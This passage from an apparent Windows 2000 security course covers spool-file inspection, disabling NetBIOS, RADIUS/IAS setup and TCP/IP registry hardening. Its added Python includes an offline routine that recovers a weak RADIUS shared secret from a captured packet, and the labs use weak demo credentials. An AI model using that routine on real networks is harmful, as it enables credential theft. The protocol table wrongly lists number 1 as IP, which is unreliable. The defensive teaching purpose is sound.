14. Click the Advanced tab, and note the default location of the spool folder. It should be \WINNT\System32\Spool\PRINTERS.
15. Click OK.
16. Right-click the printer and choose Properties.
17. Click the Advanced tab, and verify that the printer is always available, and that documents will be spooled to speed up printing.
18. Check Keep Printed Documents, and click OK.

Note: Perform step 19 through step 26 only if you are designated as Student_P.

19. Double-click My Network Places.
20. Double-click Computers Near Me.
21. Double-click the print server.
22. Right-click the printer name (next to the shared printer icon), and choose Connect.
23. Start Notepad.
24. Enter the text This is a classified document.
25. Save the file to your Desktop with the filename TOP_SECRET.txt.
26. Choose File→Print, select the printer you just connected to, and click Print. Your file should be sent to the print server.

Note: Perform step 27 through step 35 only if you are designated as the print server (Student_Q).

27. Observe the screen. Now, although there is no physical printer (or print device in Microsoft terminology) attached to your machine, the print server will try to send this job off through LPT1, and a short while later will report an error in the form of a pop-up message.
28. When the error message is displayed, click Cancel.
29. Navigate to the \WINNT\System32\Spool\PRINTERS folder.
30. Observe the contents of the PRINTERS folder. The files sent for printing are sitting there. They have job numbers followed by .SHD and .SPL file extensions. The SPL files are the actual spooled files and the SHD files are the spool header files. The SPL file is the one that interests us.
31. Double-click the SPL file.
32. When the Open With dialog box is displayed, uncheck Always Use This Program To Open These Files, and then select Notepad from the list.
33. Scroll down to the bottom of the file. Towards the end of the file, after all the printer language is taken care of, you will see the name of the file and its contents.
34. Double-click the SHD file.
35. Uncheck Always Use This Program To Open These Files, and then select Notepad from the list. You will see who sent this file and from which computer. How dangerous could this information be if it was really classified and someone with malicious intent configured the print server to Keep Printed Documents? Note that even without Keep Printed Documents, the spool files exist on disk for as long as the job is queued, so the NTFS permissions on the spool folder and physical control of the print server matter regardless of that setting.
36. Close both instances of Notepad.

Many networks stipulate the disabling of NetBIOS on the network, as it provides much information to potential attackers: computer names, logged-on user names, and share lists are all obtainable through the NetBIOS name and session services. In the following task, you will examine the network behavior when the server is configured not to communicate using NetBIOS.

TASK 4G-2
Communication without NetBIOS

Note: Perform step 1 through step 4 only if you are designated as the client (Student_P).

1. From the Start menu, choose Settings→Printers.
2. Right-click the printer, choose Delete, and then click Yes.
3. If necessary, click OK to close the Printers information box.
4. From the Start menu, choose Run, and enter \\NetBIOS_Name_of_SERVER to display an Explorer window that shows you a list of shares on the server.

Note: Perform step 5 through step 7 only if you are designated as the print server (Student_Q).

5. Open a command prompt, and enter nbtstat -S to display NetBIOS connections.
6. Observe the NetBIOS connections listed for the interface that the two computers are using for the communications.
7. Leave the command prompt open.

Note: Perform the following step only if you are designated as the client.

8. Close all open windows.

Note: Perform step 9 through step 20 only if you are designated as the server.

9. Re-enter the command nbtstat -S to refresh the display of NetBIOS connections.
10. Observe that there is one less NetBIOS connection. If the connection is still displayed, wait a few minutes and try again.
11. Now, right-click My Network Places, and choose Properties.
12. Double-click the Classroom Hub interface, and click Properties.
13. Select Internet Protocol, and then click Properties.
14. Click Advanced, and then click the WINS tab.
15. Select Disable NetBIOS Over TCP/IP.
16. Click OK, and then click Yes to acknowledge the pop-up message.
17. Click OK twice, and then click Close.
18. Repeat the last six steps to disable NetBIOS on each network interface in your computer.
19. In the command prompt, re-enter the command nbtstat -S to refresh the display.
20. Observe that there are no NetBIOS connections now.

Note: Perform step 21 through step 23 only if you are designated as the client.

21. In the Run dialog box, re-enter \\NetBIOS_Name_of_SERVER to try to get a list of shares on the server. You should see an error message. Click OK.

Instructor note: If students cannot access the list of shares in the next step, have them check to make sure that the remote account has not been locked out.

22. In the Run dialog box, enter \\IP_address_of_SERVER to try to get that list of shares. If necessary, use your partner's remote credentials to log on. You should now see an Explorer window open showing you a list of shares on the server.
23. Close all open windows.

Note: Perform the rest of this task only if you are designated as the server.

24. Re-enter the command nbtstat -S to refresh the display.
25. Observe that, even though the client is connected, there are no NetBIOS connections. The connection is now SMB carried directly over TCP (port 445) rather than over the NetBIOS session service (port 139); netstat -an on the server will show the established connection on port 445. From this, we can gather that the NetBIOS protocol is really not necessary for a Windows 2000 network, although, for backward compatibility, Microsoft will not let you install a Windows 2000 machine without a NetBIOS computer name. If (host) name resolution is required, it can be achieved via the Internet standard DNS. Bear in mind that disabling NetBIOS removes the name-service chatter and the port 139 exposure, but the share itself is still reachable on port 445, so the share permissions and the accounts allowed to reach it are what actually control access.
26. Close all open windows.

NAT and ICS

Up to this point, all of the security systems and methods you have been using are geared towards securing the operating system and data on the physical hard drive. All of the security systems that you create are of little use if an attacker is able to simply sniff all the packets off the network and recompile them at his or her leisure. Network Address Translation (NAT) is an Internet standard that is defined in RFC 1631. NAT is used to mask internal IP addresses with the IP address of the external Internet connection. Although NAT was not designed as a security mechanism, many networks require NAT in their security policies to add an additional layer between the Internet and the intranet.

NAT functions by taking a request from an internal client and making that request to the Internet on behalf of the internal client. By using this configuration, clients on the internal network are not required to have a public IP address, thus conserving public IP addresses. The internal clients can be configured with an IP address from the private network blocks. Remember, private IP addresses are ones that are not routed on the Internet. They are defined by RFC 1918, and the address ranges are:

10.0.0.0 through 10.255.255.255
172.16.0.0 through 172.31.255.255
192.168.0.0 through 192.168.255.255

NAT is an integrated part of Routing and Remote Access Service (RRAS), which will be addressed shortly, as well as part of Internet Connection Sharing (ICS). The version of NAT that is used by ICS is scaled down from the full version and does not allow for the level of configuration that the RRAS NAT allows. ICS is designed for a small office or for a home network, where there is one Internet connection that is to be shared by the entire network. All users connect via a single interface, usually connected via a modem, DSL, or cable access point.

It is also worth noting that Windows uses another range for private addressing: 169.254.0.0 through 169.254.255.255. This is the Automatic Private IP Addressing (APIPA) range that a Windows 2000 host assigns itself when no DHCP server answers. It is not one of the RFC 1918 blocks and is never routed, so a host that unexpectedly shows a 169.254.x.x address has failed to obtain its configured address rather than been placed on a private network.

The Windows 2000 Routing and Remote Access Service (RRAS) is made of several components, including:

Network Address Translation (NAT)
Routing protocols (RIP and OSPF)
Remote Access
Remote Authentication Dial-In User Service (RADIUS)

The Remote Access Server of RRAS will allow for PPP connections, and can be set up to require authentication. For authentication, RRAS can be set up to use the Remote Authentication Dial-In User Service (RADIUS) or Windows Authentication. If RRAS is using RADIUS, when a user request for authentication is made to the RRAS server, the dial-in credentials are passed to the RADIUS server. The RADIUS server then performs the authentication and authorization and returns its decision to the RRAS server, which accepts or rejects the client's access to the network.
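The exchange just described, the RRAS server (acting as RADIUS client) forwarding the dial-in credentials and the RADIUS server answering, is protected by nothing but the shared secret the two sides are configured with. The Python below is an added example, not course code, that builds the RFC 2865 Access-Request and Access-Accept at the packet level: the User-Password attribute is hidden with an MD5 stream keyed by the secret, and the reply carries a Response Authenticator the client checks. The final function shows why the secret must be strong: with one captured request for an account whose password the attacker knows, each candidate secret costs a single MD5. The authenticator and packet values are constructed.

```python
"""RADIUS (RFC 2865) password hiding and response authentication, showing
what the shared secret between the RRAS server (RADIUS client) and the RADIUS
server actually protects. Added example, not course code; the authenticator
and packet values below are constructed."""
import hashlib
import os
import struct

ACCESS_REQUEST, ACCESS_ACCEPT, ACCESS_REJECT = 1, 2, 3

def hide_password(password, secret, request_authenticator):
    """User-Password attribute value (RFC 2865 5.2): the password is padded with
    NULs to 16-byte blocks and each block XORed with MD5(secret + previous block),
    the first 'previous block' being the 16-byte Request Authenticator."""
    padded = password + b"\x00" * (-len(password) % 16) or b"\x00" * 16
    out, prev = bytearray(), request_authenticator
    for i in range(0, len(padded), 16):
        stream = hashlib.md5(secret + prev).digest()
        block = bytes(p ^ s for p, s in zip(padded[i:i + 16], stream))
        out += block
        prev = block                      # chaining uses the ciphertext block
    return bytes(out)

def unhide_password(hidden, secret, request_authenticator):
    """Inverse of hide_password; the server does this with its copy of the secret."""
    out, prev = bytearray(), request_authenticator
    for i in range(0, len(hidden), 16):
        stream = hashlib.md5(secret + prev).digest()
        out += bytes(c ^ s for c, s in zip(hidden[i:i + 16], stream))
        prev = hidden[i:i + 16]
    return bytes(out).rstrip(b"\x00")

def attribute(atype, value):
    """Type-Length-Value encoding of one attribute."""
    return struct.pack("!BB", atype, len(value) + 2) + value

def build_access_request(identifier, authenticator, username, password, secret):
    """What the RRAS server sends: User-Name (1) and hidden User-Password (2)."""
    attrs = attribute(1, username) + attribute(2, hide_password(password, secret, authenticator))
    return struct.pack("!BBH", ACCESS_REQUEST, identifier, 20 + len(attrs)) + authenticator + attrs

def response_authenticator(code, identifier, attrs, request_authenticator, secret):
    """MD5(Code + ID + Length + RequestAuth + Attributes + Secret), RFC 2865 section 3."""
    header = struct.pack("!BBH", code, identifier, 20 + len(attrs))
    return hashlib.md5(header + request_authenticator + attrs + secret).digest()

def build_response(code, identifier, request_authenticator, secret, attrs=b""):
    """Access-Accept or Access-Reject as the RADIUS server would emit it."""
    auth = response_authenticator(code, identifier, attrs, request_authenticator, secret)
    return struct.pack("!BBH", code, identifier, 20 + len(attrs)) + auth + attrs

def verify_response(response, request_authenticator, secret):
    """The RADIUS client's check that an Accept really came from its server."""
    code, identifier, length = struct.unpack("!BBH", response[:4])
    attrs = response[20:length]
    return response[4:20] == response_authenticator(code, identifier, attrs, request_authenticator, secret)

def guess_secret(hidden, request_authenticator, known_password, candidates):
    """Offline attack on a weak secret: with one captured Access-Request for an
    account whose password the attacker knows, every candidate costs one MD5."""
    for cand in candidates:
        if unhide_password(hidden, cand, request_authenticator) == known_password:
            return cand
    return None

if __name__ == "__main__":
    secret, ra = b"secret", os.urandom(16)
    req = build_access_request(1, ra, b"RaduserL1", b"aA123456", secret)
    print("Access-Request:", req.hex())
    # User-Name occupies bytes 20..30, so the hidden password value starts at 33.
    print("Server sees password:", unhide_password(req[33:], secret, ra))
    print("Client verifies Accept:", verify_response(build_response(ACCESS_ACCEPT, 1, ra, secret), ra, secret))
    print("Guessed secret:", guess_secret(req[33:], ra, b"aA123456", [b"radius", b"secret"]))
```

Two consequences for the RRAS/IAS deployment that follows: a short dictionary word as the shared secret is recoverable from one captured packet by anyone who owns a dial-in account, and the Access-Request itself carries no integrity check at all in base RFC 2865 (the Message-Authenticator attribute of RFC 2869 adds one), so the RADIUS traffic between the RRAS server and the RADIUS server belongs on a network segment the remote users cannot reach.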

The Remote Access Policy is controlled via the Internet Authentication Service (IAS), which is the Microsoft implementation of RADIUS. The Remote Access Policy is not controlled by the RRAS server itself. IAS performs several functions for remote users of the network, including authentication, authorization, auditing, and accounting, for those users who connect to the network via dial-up and VPN connections. For authentication, IAS allows for great flexibility, accepting PAP, CHAP, MS-CHAP, and EAP. EAP is the Extensible Authentication Protocol and is used in conjunction with technologies such as Smart Cards, Token Cards, and one-time passwords. Note that with PAP the user's password reaches the RRAS server in cleartext over the dial-up link and is only obscured, not strongly encrypted, on its way to the RADIUS server, so PAP should be disabled in the policy unless a client genuinely cannot use anything else.

RADIUS Implementation in the Classroom

The following section contains several long tasks, involving the implementation of the RADIUS server and the RADIUS client. For these tasks, students should work in pairs (Student_P and Student_Q). These pairs of machines will participate in a RAS exercise where all of the computers designated as Student_P are configured as the Remote Access Client (or Dialup Client) and dial out to their corresponding Dialup Server, which are the computers designated as Student_Q. These Dialup Servers will also be configured as RADIUS clients. These RADIUS clients will pass on authentication requests to the Instructor Machine, which will be configured as the RADIUS Server. Thus, the Instructor Machine will function as the RADIUS Server for the whole class and is an integral part of the task.

For the rest of the tasks associated with implementing RADIUS, these machines will be referred to as follows:

Student_P: Windows 2000 Server as a Dialup Client.
Student_Q: Windows 2000 Server as a RADIUS Client.
Instructor_Machine: Windows 2000 Server as a RADIUS Server.

TASK 4G-3
Physically Preparing for RADIUS Implementation

Objective: To take care of some physical connectivity issues prior to implementing RADIUS in the classroom.

1. Verify that the null modem cable between the Dialup Client and the RADIUS Client is firmly in place.
2. On the Dialup Client, disable both Ethernet adapters.
3. If necessary, on the RADIUS Client, disable the Ethernet adapter connected to the Dialup Client, but leave the Ethernet adapter connected to the classroom hub enabled. See the class configuration diagram that follows for guidance.
4. On the RADIUS Server, do nothing. All of the RADIUS Clients will contact this server via the existing network.

You should have a class configuration that looks like the following graphic.

Configuring the Dialup Server

In the next task, you will configure the Dialup Server component of the RADIUS Client. You will configure this server to allocate IP addresses to Dialup Clients for the dialup interfaces. For the task, if the RADIUS Client is on the left side of the classroom and is seat number 3, then the range you should use is 192.168.163.101 to 192.168.163.110. If the RADIUS Client is on the right side of the classroom and is seat number 8, then the range you should use is 192.168.188.101 to 192.168.188.110. Your instructor will clarify addressing requirements if you have any doubts at this point.

TASK 4G-4
Configuring the Dialup Server

Note: Perform this task only if you are designated as a RADIUS Client.

1. From the Start menu, choose Settings→Network And Dial-up Connections.
2. Verify that the Ethernet connection connected to your neighbor's computer is disabled.
3. Open a command prompt, and use the ipconfig /all command to verify that you have just one IP address. This should be in either the 172.16.x.x or 172.18.x.x network. Close the command prompt.
4. Double-click Make New Connection, provide the local area code (if prompted), and then click Next.
5. Click Connect Directly To Another Computer, and click Next.
6. Select Host, and click Next.
7. Select the device (Communications Port [COM1]), and click Next.
8. In the next box, you are supposed to select those users who can dial in; however, this RAS server will eventually be configured as a RADIUS client. So for now, we will configure a user only for the purposes of testing the cable connection. Click Add. For the User Name, enter radtest. For Password, enter aA123456, confirm it, and click OK. Click Next.
9. Read the name for your connection, and click Finish. It might take a while for the Wizard to close, so be patient.
10. Right-click Incoming Connections, and choose Properties.
11. Click the Networking tab, select Internet Protocol (TCP/IP), and click Properties.
12. Under TCP/IP Address Assignment, click Specify TCP/IP Addresses. If you are on the left side of the classroom, enter the range 192.168.16x.101 to 192.168.16x.110, where x is your seat number. If you are on the right side of the classroom, enter the range 192.168.18x.101 to 192.168.18x.110, where x is your seat number.
13. Click OK twice.
14. Open Control Panel.
15. Double-click Phone And Modem Options.
16. Click the Modems tab.
17. If necessary, select Communications Cable Between Two Computers, and click Properties.
18. Under Maximum Port Speed, select 115200 from the drop-down list.
19. Click OK twice, and then close all open windows.

Configuring the Dialup Client

Once the Dialup Server has been configured, a significant portion of the initial configuration has been completed. The next part of the process will be to configure the clients for dial-up usage. The setup of the two computers remains the same for this portion of the RADIUS implementation tasks.

TASK 4G-5
Configuring the Dialup Client

Note: Perform step 1 through step 20 only if you are designated as a Dialup Client.

1. From the Start menu, choose Settings→Network And Dial-up Connections.
2. Verify that your Ethernet connections are disabled.
3. Open a command prompt, and use the ipconfig /all command to verify that you have no IP addresses. Close the command prompt.
4. Double-click Make New Connection, provide the local area code (if prompted), and click Next.
5. Click Connect Directly To Another Computer, and click Next.
6. Select Guest, and click Next.
7. Select the device (Communications Port [COM1]), and click Next twice.
8. Provide a name for your direct connection, such as DUN_01, and click Finish. It might take a while for the wizard to close, so be patient. When you are prompted to make a connection, click Cancel.
9. Open Control Panel, and double-click Phone And Modem Options.
10. Click the Modems tab.
11. Select Communications Cable Between Two Computers, and click Properties.
12. Under Maximum Port Speed, select 115200 from the drop-down list.
13. Click OK twice.
14. Right-click your direct connection, choose Properties, and then click Configure.
15. For Maximum Speed (bps), select 115200 from the drop-down list.
16. Click OK twice.
17. Double-click your direct connection.
18. For the User Name and Password, enter radtest and aA123456, respectively, and click Connect. You should be connected to the dialup server in a few seconds.
19. Click OK to close the Connection Complete information box.
20. Verify your IP address by using the ipconfig /all command in a command prompt. You should have a 192.168.16x.y or 192.168.18x.y address assigned to the dialup interface. Close the command prompt.

Note: Perform the next step only if you are designated as a RADIUS Client.

21. Verify your IP address(es) by using the ipconfig /all command in a command prompt. You should now have a 192.168.16x.y or 192.168.18x.y address assigned to the dialup interface. Close the command prompt.

Note: Perform the next step only if you are designated as a Dialup Client.

22. In the Network And Dial-up Connections Control Panel, right-click your direct connection, and choose Disconnect.

Creating Users on the RADIUS Server

Now that the Dialup Server and Dialup Client configurations have been completed, it is time to move on to the RADIUS Server. Because each machine in the classroom cannot be a server, your instructor will configure the Instructor Machine to be the RADIUS Server. Pay close attention to the steps being taken. First, a database of users will be created (this is the kind of task that an ISP would perform to keep its user database centrally located).

INSTRUCTOR TASK 4G-6
Creating Users on the RADIUS Server

Setup: Your instructor will perform this task at the Instructor Machine.

1. If necessary, log on to Windows 2000 Server as Administrator.
2. Right-click My Computer, and choose Manage.
3. In the left pane, expand Local Users And Groups and right-click the Users folder.
4. Choose New User.
5. For User Name, enter RaduserL1.
6. For Password, enter aA123456, and confirm it.
7. Uncheck User Must Change Password At Next Logon. Check User Cannot Change Password and Password Never Expires.
8. Click Create.
9. Repeat the last five steps to create users named RaduserL3, RaduserL5, RaduserL7, RaduserR1, RaduserR3, RaduserR5, and RaduserR7.
10. Click Close.
11. Click the Users folder.
12. Verify the names of the users you just created.
13. Inform each student pair (Dialup Client and RADIUS Client) which Raduser account they will use later when testing RADIUS authentication. For example, the second pair on the right side of the classroom should use RaduserR3.
14. Leave the Computer Management MMC open.

INSTRUCTOR TASK 4G-7

Installing IAS

User accounts have been created for the remote access connections. Next, IAS will be installed on the Instructor Machine to make it a RADIUS Server. Following that, RADIUS Clients that are allowed to communicate with the RADIUS Server will be specified on the RADIUS Server. A policy will also be configured on the RADIUS Server to allow users who meet the authentication requirements to be granted access.

Setup: Your instructor will perform this task at the Instructor Machine.

1. Right-click My Network Places, and choose Properties.

2. Choose Advanced→Optional Networking Components. Do not check or uncheck any boxes.

3. Select Networking Services, and click Details.

4. Check Internet Authentication Service, and click OK. IAS is Microsoft's implementation of RADIUS.

5. Click Next.

6. From the Start menu, choose Programs→Administrative Tools→Internet Authentication Service.

7. In the left pane, right-click Clients, and choose New Client. You will be prompted to enter a friendly name. For Friendly Name, enter RADCLIENT_L01 and click Next.

8. Enter the IP address of the RADIUS Client belonging to the first student pair on the left side of the class.

9. For Shared Secret and Confirm Shared Secret, enter secret.

10. Click Finish.

11. Repeat the last five steps to account for all RADIUS Clients in the class, on both the left and right sides.

12. In the left pane, click Remote Access Policies.

13. In the right pane, double-click the policy.

14. Under If A User Matches The Conditions, select Grant Remote Access Permission.

15. Click OK, and close all open windows.

TASK 4G-8

Installing RIP

To allow Dialup Clients to eventually communicate, the Dialup Servers need to know the various networks that will be coming up and create routes for them. So, you will install RIP, because that is all that is required in this classroom. A more complicated network will need more sophisticated dynamic routing protocols.

Setup: This task requires the instructor and students to perform steps.

Note: Perform step 1 through step 6 only if you are the instructor.

1. From the Start menu, choose Programs→Administrative Tools→Routing And Remote Access.

2. In the left pane, right-click your computer name, and choose Configure And Enable Routing And Remote Access.

3. Click Next, select Manually Configured Server, click Next, and then click Finish. When you are prompted to start the service, click Yes.

4. In the left pane, expand the computer name, and then expand IP Routing.

5. Right-click General, choose New Routing Protocol, and select RIP, or RIPv2 (whichever is listed). Click OK.

6. Right-click RIP, choose New Interface, select your network interface, and click OK twice. Close the RRAS console.

Note: Perform step 7 through step 12 only if you are designated as a RADIUS Client.

7. From the Start menu, choose Programs→Administrative Tools→Routing And Remote Access.

8. In the left pane, right-click your computer name, and choose Configure And Enable Routing And Remote Access.

9. Click Next, select Manually Configured Server, click Next, and then click Finish. When you are prompted to start the service, click Yes.

10. In the left pane, expand the computer name, and then expand IP Routing.

11. Right-click General, choose New Routing Protocol, and select RIP. Click OK.

12. Right-click RIP, choose New Interface, select your network interface, and click OK twice.

TASK 4G-9

Configuring the Dialup Server as a RADIUS Client

In this next task, you will configure your Dialup Server to behave as a RADIUS Client. Unlike the RADIUS Server, no extra software needs to be added to your server. It's just a matter of configuring your Dialup Server for pass-through authentication.

Note: Perform this task only if you are designated as a RADIUS Client.

1. In the left pane, right-click your computer name, and choose Properties.

2. Click the Security tab.

3. Under Authentication Provider, select RADIUS Authentication from the drop-down list.

4. Click the Configure button found to the right of the drop-down list.

5. Under The Following RADIUS Servers Are Queried In Order From The Highest To The Lowest Score, click Add.

6. Specify the IP address of the RADIUS Server. This is your instructor machine's IP address, which should be 172.17.10.1.

7. For Secret, click the Change button, and enter the same secret your instructor entered on the RADIUS Server (the word secret).

8. Observe that the registered UDP port number used for RADIUS authentication is 1812.

9. Click OK.

10. Observe that there is a value of 30 under Initial Score. What this means is that you can configure your RADIUS Client to send authentication requests to more than one RADIUS authentication server. When you have more than one server to choose from, the server with the higher number is checked first. The scale runs from 0 to 30.

11. Click OK.

12. If you are prompted to restart RRAS, click OK; you will do this shortly anyway.

13. Perform the same sequence of steps to configure your RADIUS Client to communicate with a RADIUS Accounting provider.

14. Click OK. Acknowledge any information boxes regarding restarting the service.

15. In the left pane, right-click your computer name, and choose All Tasks→Restart.

16. After the Restarting process box closes, close the RRAS console.

TASK 4G-10

Testing the Dialup Client

Now that all the necessary components for RADIUS are in place, you will test it. From the Dialup Client, you will make a call to the Dialup Server. Because you have configured this server for pass-through authentication, any authentication request you receive on the Dialup Server will be sent to the RADIUS Server. If authentication is approved, the Dialup Client will be able to connect, receive an IP address, and be part of the network.

Note: Perform this task only if you are designated as a Dialup Client.

1. In the Networking And Dial-up Connections Control Panel, double-click your dialup connection.

2. For the User Name and Password, enter the appropriate Raduser name (such as RaduserL1, depending on which student pair you're part of) and aA123456, and click Connect. You should be authenticated by the RADIUS Server and connected to the RADIUS Client (which is your dialup server) in a few seconds.

3. Click OK to acknowledge the Connection Complete information box.

4. Verify your IP address by using the ipconfig /all command at a command prompt. When you connected to the RADIUS Client, you had a 192.168.16x.y or 192.168.18x.y address. You should now see a different address assigned to the dialup interface. Because you logged on as RaduserX, only the RADIUS Server could have authenticated you. The RADIUS Client simply passed on this authentication request to the RADIUS Server and passed the approval back to the Dialup Client.

5. Close the command prompt.

Bringing Back the Network

Once you have tested the RADIUS configuration, you need to return the classroom configuration to the state it was in before you started the RADIUS tasks. The following quick task will walk you through what is required to bring the network back to normal status.

TASK 4G-11

Reconfiguring the Network

Note: Perform step 1 through step 2 only if you are designated as a Dialup Client.

1. If necessary, open the Networking And Dial-up Connections Control Panel.

2. Right-click your dialup connection, and choose Disconnect.

Note: Perform step 3 through step 4 only if you are designated as a RADIUS Client.

3. Right-click My Network Places, and choose Properties.

4. Right-click and enable the Partner interface. Close all open windows.

Right-click and enable your network interfaces. Close all open windows.

Hardening TCP/IP

The TCP/IP stack in Windows is one of the most attacked components of personal computers. Common attacks include Denial of Service (DoS) attacks, Distributed Denial of Service (DDoS) attacks, spoofing, smurf, and Land attacks, just to name a few. There are some configurations that can be made to the Registry to harden the actual TCP/IP stack in Windows 2000. These configurations are recommended by Microsoft, are designed specifically to help defend against Denial of Service attacks, and should be another component of your layered defense. The following settings can be configured in the Registry. Remember to be careful in the Registry, as errors in configuration can cause Windows to no longer function properly and could require a reinstall. All of the following configurations, which are all hexadecimal values unless noted otherwise, are found in this Registry key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services.

Denial of Service: Action(s) which prevent any part of an AIS from functioning in accordance with its intended purpose.

smurfing: A denial of service attack in which an attacker spoofs the source address of an echo-request ICMP (ping) packet to the broadcast address for a network, causing the machines in the network to respond en masse to the victim.

Syn Attack Defense

Configuring this value will modify how Windows reacts to SYN-ACKs, which are often used in DoS attacks. The result of this configuration is to modify the response timeout when a DoS attack is detected. In order to determine if an attack is in progress, Windows will use the following three values:
TCPMaxPortsExhausted
TCPMaxHalfOpen
TCPMaxHalfOpenRetried

There are three options for this value. The specifics are defined as follows:
Value Name: SynAttackProtect
Key: Tcpip\Parameters
Valid Range: 0, 1, 2
Default Value: 0
Value Type: REG_DWORD

A setting of 0 is the default, which Windows defines as typical protection against SYN attacks. A setting of 1 will cause TCP to adjust the retransmission rates of SYN-ACKs, so that connection responses will time out quicker during SYN attacks. A setting of 2 is considered the strongest protection against SYN attacks. This setting will cause TCP connection requests to time out even quicker during SYN attacks. From a security perspective, a setting of 2 is recommended.

Dead Gateway

Multiple gateways can be configured in the settings of TCP/IP. You can, however, disable this function, since a Denial of Service (or other) attack can cause your machine to switch gateways. The specifics for this are defined as follows:
Value Name: EnableDeadGWDetect
Key: Tcpip\Parameters
Value Type: REG_DWORD
Valid Range: 0 (False), 1 (True)
Default Value: 1 (True)

A setting of 1 will allow TCP to perform dead-gateway detection and change to a backup gateway. A setting of 0 will disallow this function. From a security perspective, a setting of 0 is recommended.

MTU Restrictions

Attackers can use the Maximum Transmission Unit to force a network to use very small segments. By using Path MTU Discovery, TCP tries to identify the largest packet size that a path to a remote host will accommodate. Conversely, when used incorrectly, the network can be flooded with tiny segments. The specifics for adjusting this value are defined as follows:
Value Name: EnablePMTUDiscovery
Key: Tcpip\Parameters
Valid Range: 0 (False), 1 (True)
Default Value: 1 (True)

A setting of 1 will allow TCP to discover the largest segment size to a remote host. A setting of 0 will fix the MTU size to 576 bytes for all communication with a host not on the local subnet. Communication to local hosts will still use the largest segment size; only remote host communication is affected. From a security perspective, a setting of 0 is recommended.

Keep Alive

Default TCP behavior in Windows does not verify idle connections. It is recommended that these connections be verified (using third-party software, if need be) for availability by sending a keep-alive packet and waiting for the response. If there is no response, then the idle connection can be closed. The specifics for adjusting this value are defined as follows:
Value Name: KeepAliveTime
Key: Tcpip\Parameters
Value Type: REG_DWORD (The value is in milliseconds)
Valid Range: 1-0xFFFFFFFF
Default Value: 7,200,000 (two hours)

The recommended setting for this value is 300,000, which is five minutes.

TASK 4G-12

Configuring TCP/IP in the Registry

Setup: You are logged on to Windows 2000 as the renamed Administrator account.

Note: This task should be performed by all students.

1. Open a Registry Editor.

2. Navigate to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services.

3. Open the Tcpip\Parameters key.

4. In the right pane, right-click and add the following REG_DWORD values:
a. SynAttackProtect
b. EnableDeadGWDetect
c. EnablePMTUDiscovery
d. KeepAliveTime

5. Double-click SynAttackProtect, and enter a value of 2.

6. Double-click EnableDeadGWDetect, and enter a value of 0.

7. Double-click EnablePMTUDiscovery, and enter a value of 0.

8. Double-click KeepAliveTime, and enter a decimal value of 300,000. In Hex notation, this is 493E0.

9. Close the Registry Editor.
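To verify the four values after the fact rather than by eye, here is an added Python example (not from the course book): it parses a Registry Editor export (regedit /e) of the Tcpip\Parameters key and reports which of the values still differ from the recommendations above, treating an absent value as the Windows 2000 default the section lists. The export text below is constructed for the example.

```python
"""Audit the four Tcpip\\Parameters hardening values discussed above.

Added example (not from the course book). It parses the text that a
Registry Editor export (regedit /e) produces for the Tcpip\\Parameters key
and compares each of the four values against the recommendation in the
text, treating an absent value as Windows 2000's default.
"""
import re

TCPIP_PARAMETERS = (
    r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters"
)

# name -> (default when the value is absent, recommended value)
# Defaults and recommendations are the ones stated in the section above.
RECOMMENDED = {
    "SynAttackProtect": (0, 2),
    "EnableDeadGWDetect": (1, 0),
    "EnablePMTUDiscovery": (1, 0),
    "KeepAliveTime": (7_200_000, 300_000),   # milliseconds
}

_KEY_RE = re.compile(r"^\[(.+)\]\s*$")
_DWORD_RE = re.compile(r'^"([^"]+)"=dword:([0-9A-Fa-f]{1,8})\s*$')


def parse_reg_export(text):
    """Return {key_path: {value_name: int}} for the REG_DWORD values in a .reg export."""
    keys = {}
    current = None
    for line in text.splitlines():
        m = _KEY_RE.match(line)
        if m:
            current = m.group(1)
            keys.setdefault(current, {})
            continue
        m = _DWORD_RE.match(line)
        if m and current is not None:
            # dword values are written in hexadecimal in a .reg file
            keys[current][m.group(1)] = int(m.group(2), 16)
    return keys


def audit_tcpip(text):
    """Compare the exported Tcpip\\Parameters values with the recommendations.

    Returns a list of (name, effective_value, recommended, compliant) tuples,
    one per hardening value, in the order the section lists them.
    """
    values = parse_reg_export(text).get(TCPIP_PARAMETERS, {})
    report = []
    for name, (default, recommended) in RECOMMENDED.items():
        effective = values.get(name, default)   # absent value -> Windows default
        report.append((name, effective, recommended, effective == recommended))
    return report


def noncompliant(text):
    """Names of the values that still need to be changed."""
    return [name for name, _, _, ok in audit_tcpip(text) if not ok]


# Constructed sample export: SynAttackProtect already hardened, KeepAliveTime
# still at its 7,200,000 ms default (0x6DDD00), the other two values absent.
SAMPLE_EXPORT = """Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters]
"SynAttackProtect"=dword:00000002
"KeepAliveTime"=dword:006ddd00
"""

if __name__ == "__main__":
    for name, value, wanted, ok in audit_tcpip(SAMPLE_EXPORT):
        status = "ok" if ok else "CHANGE"
        print(f"{name:<20} current={value:<8} (0x{value:X}) recommended={wanted} {status}")
```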

TCP/IP Filtering

Another built-in Windows 2000 feature that you can add to your layered defense is TCP/IP filtering. TCP/IP filtering is a method of controlling inbound network access to a host. TCP/IP filtering is independent of other processes, such as IPSec, and other services, such as the Server and Workstation services. To control outbound access, you need to implement Routing And Remote Access filters.

When you enable TCP/IP filtering on one interface, it is enabled on all interfaces; however, you must configure the specific filters on a per-interface basis. When you are configuring the port filters, the options are to enable all ports or to define the ports that are to be allowed. Remember that this is configuring inbound ports, not outbound. The system will not filter responses to requests initiated by the host, so you will not need to open high ports for network responses. Finally, if you want to filter protocols, be aware that you cannot block ICMP messages. This is the case even if you exclude IP Protocol 1 from the allowed protocol list. A simple way to block TCP traffic, for example, is to select the option to filter TCP ports, but not add any ports to the allowed list.

When you are configuring filtering, you have the option to control access to TCP ports, to UDP ports, and to specific IP protocols. Each access point is controlled by the numerical value. In other words, you control port access by the port number, such as 80 for WWW access. To control an entire protocol, use the IP protocol number. The following table lists, for quick reference, several common IP protocol numbers to use in filtering.

Protocol Number   Protocol Acronym   Full Name of Protocol
1                 IP                 Internet Protocol
6                 TCP                Transmission Control Protocol
17                UDP                User Datagram Protocol

TASK 4G-13

Configuring Port and Protocol Filtering

Setup: You are logged on to Windows 2000 as the renamed Administrator account.

1. Navigate to the Properties for the Classroom Hub interface.

2. Scroll to and select Internet Protocol (TCP/IP), and then click Properties.

3. Click the Advanced button.

4. Display the Options tab.

5. Select TCP/IP Filtering, and click Properties.

6. Check Enable TCP/IP Filtering.

